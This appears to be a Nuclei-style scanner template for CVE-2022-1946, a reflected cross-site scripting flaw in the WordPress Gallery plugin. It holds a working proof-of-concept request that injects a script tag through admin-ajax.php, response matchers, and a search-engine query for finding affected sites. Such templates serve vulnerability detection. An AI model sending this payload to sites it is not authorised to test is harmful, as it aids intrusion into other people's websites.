44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: CVE-2022-1946
|
|
|
|
info:
|
|
name: WordPress Gallery <2.0.0 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: WordPress Gallery plugin before 2.0.0 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, available to both unauthenticated and authenticated users.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/0903920c-be2e-4515-901f-87253eb30940
|
|
- https://wordpress.org/plugins/gallery-album
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1946
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-1946
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
google-query: inurl:"/wp-content/plugins/gallery-album/"
|
|
verified: "true"
|
|
tags: wpscan,cve2022,wp,xss,wordpress,gallery,unauth,cve,wp-plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/09/14
|